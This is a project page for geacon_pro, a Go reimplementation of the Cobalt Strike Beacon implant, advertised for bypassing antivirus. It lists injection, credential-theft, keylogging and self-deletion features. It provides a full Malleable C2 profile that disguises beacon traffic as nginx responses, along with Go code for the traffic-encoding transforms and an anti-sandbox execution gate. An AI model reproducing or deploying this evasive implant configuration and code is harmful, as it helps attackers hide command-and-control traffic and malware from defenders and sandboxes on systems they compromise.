geacon_pro: cross-platform CobaltStrike Beacon with anti-virus bypass

CobaltStrike Beacon with anti-virus bypass

geacon_pro

geacon_pro is a CobaltStrike Beacon reimplemented in Go with anti-virus evasion, based on the geacon project.

geacon_pro supports CobaltStrike 4.1 and later.

geacon_pro implements most of Beacon's functions.


Anti-virus evasion rests on three points:

  • It contains none of the original CobaltStrike Beacon's signatures (byte patterns), because it is an independent Go reimplementation.
  • Binaries written in Go evade antivirus detection to some extent.
  • Functions that antivirus products readily flag as dangerous have been replaced with stealthier implementations.

Functions

Windows platform:

sleep, shell, upload, download, exit, cd, pwd, file_browse, ps, kill, getuid, mkdir, rm, cp, mv, run, execute, drives, powershell-import, powershell, execute-assembly, multiple thread-injection methods (swappable in the source code), inject, shinject, dllinject, pipe, CobaltStrike's native reflective DLL jobs (mimikatz, portscan, screenshot, keylogger, etc.), steal_token, rev2self, make_token, getprivs, proxy, delete self, timestomp, etc. CNA custom plugins that rely on reflective DLLs, execute-assembly, powershell, powerpick, upload-and-execute and similar functions are also supported.

Linux, Mac platform:

sleep, shell, upload, download, exit, cd, pwd, file_browse, ps, kill, getuid, mkdir, rm, cp, mv, delete self, etc.

Process management and file management can be driven from the CobaltStrike client's graphical process browser and file browser.

C2profile:

geacon_pro honours the data-transform settings of the Malleable C2 profile and some of the host settings. The supported encoding steps are base64, base64url, mask, netbios and netbiosu; see config.go for details. An example C2 profile follows. IMPORTANT: after changing the C2 profile, mirror the changes in config.go, otherwise the beacon and the team server will disagree on how the traffic is transformed.

# sleep time in milliseconds (the Cobalt Strike default is 60000, i.e. 60s)

set sleeptime "3000";
set jitter "7";

https-certificate {
set C "KZ";
set CN "foren.zik";
set O "NN Fern Sub";
set OU "NN Fern";
set ST "KZ";
set validity "365";
}

# define indicators for an HTTP GET
http-get {

set uri "/www/handle/doc";

client {
#header "Host" "aliyun.com";
# base64 encode session metadata and store it in the Cookie header.
metadata {
base64url;
prepend "SESSIONID=";
header "Cookie";
}
}

server {
# server should send output with no changes
#header "Content-Type" "application/octet-stream";
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}

# define indicators for an HTTP POST
http-post {
# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
set uri "/IMXo";
client {
#header "Content-Type" "application/octet-stream";

# transmit our session identifier as /submit.php?id=[identifier]

id {
mask;
netbiosu;
prepend "user=";
append "%%";
header "User";
}

# post our output with no real changes
output {
mask;
base64url;
prepend "data=";
append "%%";
print;
}
}

# The server's response to our HTTP POST
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

# encode the server's response to the POST (typically empty)
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}

post-ex {
set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";

set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
set keylogger "SetWindowsHookEx";
}
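
The transform chains of the profile above, worked through as an added Go example; this is not geacon_pro's config.go or any code from the project. It implements the steps as Cobalt Strike's Malleable C2 documentation describes them: mask XORs the data with a random 4-byte key and prepends that key, netbios/netbiosu emit one letter per nibble counted from 'a' or 'A', and prepend/append wrap the data in literal strings. base64url is left out because Go's encoding/base64 URLEncoding already provides it. The Transform, Chain and Affix names and the sample payloads are this example's own.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"fmt"
)

// Transform is one data-transform step of a Malleable C2 profile; Decode undoes Encode.
type Transform interface {
	Encode([]byte) ([]byte, error)
	Decode([]byte) ([]byte, error)
}

// Chain applies its steps in profile order and undoes them in reverse order.
type Chain []Transform

func (c Chain) Encode(b []byte) (out []byte, err error) {
	for _, t := range c {
		if b, err = t.Encode(b); err != nil {
			return nil, err
		}
	}
	return b, nil
}

func (c Chain) Decode(b []byte) (out []byte, err error) {
	for i := len(c) - 1; i >= 0; i-- {
		if b, err = c[i].Decode(b); err != nil {
			return nil, err
		}
	}
	return b, nil
}

// Mask XORs the data with a fresh random 4-byte key and prepends that key, so the
// same plaintext never produces the same bytes on the wire.
type Mask struct{}

func (m Mask) Encode(b []byte) ([]byte, error) {
	key := make([]byte, 4)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	body, _ := m.Decode(append(key, b...)) // XOR is its own inverse, so masking is decoding
	return append(key, body...), nil
}

func (Mask) Decode(b []byte) ([]byte, error) {
	if len(b) < 4 {
		return nil, fmt.Errorf("mask: %d bytes is shorter than the 4-byte key", len(b))
	}
	out := make([]byte, len(b)-4)
	for i, c := range b[4:] {
		out[i] = c ^ b[i%4]
	}
	return out, nil
}

// NetBIOS writes each byte as two letters, one per nibble, counted from 'a' (netbios)
// or 'A' (netbiosu); Decode rejects odd lengths and letters outside that range.
type NetBIOS struct{ Base byte }

func (n NetBIOS) Encode(b []byte) ([]byte, error) {
	out := make([]byte, 0, 2*len(b))
	for _, c := range b {
		out = append(out, n.Base+(c>>4), n.Base+(c&0x0f))
	}
	return out, nil
}

func (n NetBIOS) Decode(b []byte) ([]byte, error) {
	if len(b)%2 != 0 {
		return nil, fmt.Errorf("netbios: odd input length %d", len(b))
	}
	out := make([]byte, len(b)/2)
	for i := range out {
		hi, lo := b[2*i]-n.Base, b[2*i+1]-n.Base // byte subtraction wraps above 15 for bad letters
		if hi > 15 || lo > 15 {
			return nil, fmt.Errorf("netbios: bad letter at offset %d", 2*i)
		}
		out[i] = hi<<4 | lo
	}
	return out, nil
}

// Affix implements prepend/append; Decode refuses input that lacks either literal.
type Affix struct{ Pre, Suf string }

func (a Affix) Encode(b []byte) ([]byte, error) { return []byte(a.Pre + string(b) + a.Suf), nil }
func (a Affix) Decode(b []byte) ([]byte, error) {
	if !bytes.HasPrefix(b, []byte(a.Pre)) || !bytes.HasSuffix(b[len(a.Pre):], []byte(a.Suf)) {
		return nil, fmt.Errorf("affix: %q lacks prefix %q or suffix %q", b, a.Pre, a.Suf)
	}
	return b[len(a.Pre) : len(b)-len(a.Suf)], nil
}

// Two chains from the profile above, with the steps in the order the profile lists them.
var (
	GetOutput = Chain{Mask{}, NetBIOS{'a'}, Affix{"data=", "%%"}} // http-get server output
	PostID    = Chain{Mask{}, NetBIOS{'A'}, Affix{"user=", "%%"}} // http-post client id
)

func main() {
	wire, _ := PostID.Encode([]byte("constructed sample, not a real session id"))
	back, err := PostID.Decode(wire)
	fmt.Printf("%s\n%q %v\n", wire, back, err) // letters differ per run because the mask key is random
}
```

Decode is where the checks matter: anyone replaying or inspecting this traffic (the team server, or an analyst rebuilding the transforms for detection) receives attacker-controlled bytes, so odd lengths, out-of-range letters, short mask inputs and missing literals are rejected instead of producing garbage or a panic.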

Custom settings

There are some custom settings in config.go:

  • Proxy sends the beacon's traffic through a proxy. See Implementation Details.
  • Remark labels the machine so that different deployments can be told apart: with Remark="test", the host appears in the console as ComputerName [test].
  • ExecuteKey is a simple anti-sandbox measure. With ExecuteKey set to "password", the binary runs only when started as geacon_pro.exe password; a sandbox or a blue-team analyst who does not know the key cannot execute it. Note that the key is passed on the command line, so it defeats automated detonation rather than an analyst who has captured how the binary was launched.
  • ExecuteTime is a simple anti-sandbox measure: if the current time is later than the configured time, execution fails. The configured time is interpreted as UTC.
  • DeleteSelf sets whether the binary deletes itself.
  • HideConsole sets whether the console window is hidden.
  • CommandReadTime sets the interval at which the output of long-running commands is echoed back asynchronously.
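
The ExecuteKey and ExecuteTime checks, as an added Go example rather than geacon_pro's own code: Gate, ParseDeadline and Allowed are names chosen here, the key "password" and the 2030 cut-off are constructed values, and the real binary's argument handling is not shown on this page. The point it makes is the UTC caveat above: the cut-off has to be parsed and compared as UTC, otherwise a host clock in a western time zone would keep running the implant for hours after the intended deadline.

```go
package main

import (
	"fmt"
	"os"
	"time"
)

// Gate holds the two anti-sandbox settings. The field and function names are
// this example's own and do not correspond to identifiers in config.go.
type Gate struct {
	ExecuteKey  string    // required as the first command-line argument; "" disables the check
	ExecuteTime time.Time // UTC cut-off after which execution is refused; zero value disables the check
}

// ParseDeadline reads "YYYY-MM-DD HH:MM:SS" explicitly as UTC, so the host's
// local time zone cannot move the cut-off.
func ParseDeadline(s string) (time.Time, error) {
	return time.ParseInLocation("2006-01-02 15:04:05", s, time.UTC)
}

// Allowed reports whether execution may proceed at instant now, given argv args
// (args[0] is the program name, as in os.Args), and the reason when it may not.
func (g Gate) Allowed(args []string, now time.Time) (bool, string) {
	if g.ExecuteKey != "" {
		if len(args) < 2 {
			return false, "execute key missing"
		}
		if args[1] != g.ExecuteKey {
			return false, "wrong execute key"
		}
	}
	// Converting now to UTC before comparing is what makes the cut-off zone-independent.
	if !g.ExecuteTime.IsZero() && now.UTC().After(g.ExecuteTime) {
		return false, "past ExecuteTime " + g.ExecuteTime.Format(time.RFC3339)
	}
	return true, ""
}

func main() {
	deadline, err := ParseDeadline("2030-01-01 00:00:00") // constructed value
	if err != nil {
		panic(err)
	}
	g := Gate{ExecuteKey: "password", ExecuteTime: deadline}
	if ok, why := g.Allowed(os.Args, time.Now()); !ok {
		fmt.Println("refusing to run:", why)
		os.Exit(1)
	}
	fmt.Println("gate passed; the implant would continue from here")
}
```

Run it as `go run . password` to pass the gate, or with no argument to see the refusal.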

Install & Use